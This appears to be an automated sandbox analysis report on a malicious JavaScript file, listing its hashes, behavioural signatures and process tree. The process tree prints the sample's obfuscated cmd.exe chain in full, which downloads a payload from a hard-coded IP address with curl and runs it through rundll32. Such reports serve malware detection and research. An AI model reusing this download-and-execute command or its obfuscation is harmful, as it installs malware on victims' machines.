Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
16/10/2023, 14:08
Static task
static1
Behavioral task
behavioral1
Sample
E-6.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
E-6.js
Resource
win10v2004-20230915-en
General
-
Target
E-6.js
-
Size
413KB
-
MD5
f33aa5fde88b857beecddbaf7b458462
-
SHA1
714f52910b5ad25f4367620f5080c1d296fc5fe8
-
SHA256
9230432b182ab7a828d024bca43c80fc0a3161d579932fd403ebb0c441309fae
-
SHA512
128a2eea881a1282d9c288f3ad2d174047379f6314f6b900b818016a7816e60828b2e7866a5b911642e41e1e6b1d2d83c106bb0053366581677c5f70d7336a31
-
SSDEEP
6144:hj38P9IwPaHP79bvi5u9r9pMrSxykQ+/weOMymjSXdxED3wNnQq:9OB+mNXdxE0Nn7
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1728 wscript.exe 5 1728 wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1276 PING.EXE 1680 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1728 wrote to memory of 2204 1728 wscript.exe 28 PID 1728 wrote to memory of 2204 1728 wscript.exe 28 PID 1728 wrote to memory of 2204 1728 wscript.exe 28 PID 2204 wrote to memory of 1680 2204 cmd.exe 30 PID 2204 wrote to memory of 1680 2204 cmd.exe 30 PID 2204 wrote to memory of 1680 2204 cmd.exe 30 PID 2204 wrote to memory of 1276 2204 cmd.exe 31 PID 2204 wrote to memory of 1276 2204 cmd.exe 31 PID 2204 wrote to memory of 1276 2204 cmd.exe 31 PID 2204 wrote to memory of 1968 2204 cmd.exe 32 PID 2204 wrote to memory of 1968 2204 cmd.exe 32 PID 2204 wrote to memory of 1968 2204 cmd.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\E-6.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wUE || ecHo wUE & PInG wUE || cUrL http://193.168.141.169/EAgTzBF/mesoc -o %tmP%\wUE.log & PInG -n 3 wUE || RUNdlL32 %tMp%\wUE.log scab /k haval462 & exIt nwBgtrtktlX2⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\PING.EXEPInG wUE3⤵
- Runs ping.exe
PID:1680
-
-
C:\Windows\system32\PING.EXEPInG -n 3 wUE3⤵
- Runs ping.exe
PID:1276
-
-
C:\Windows\system32\rundll32.exeRUNdlL32 C:\Users\Admin\AppData\Local\Temp\wUE.log scab /k haval4623⤵PID:1968
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf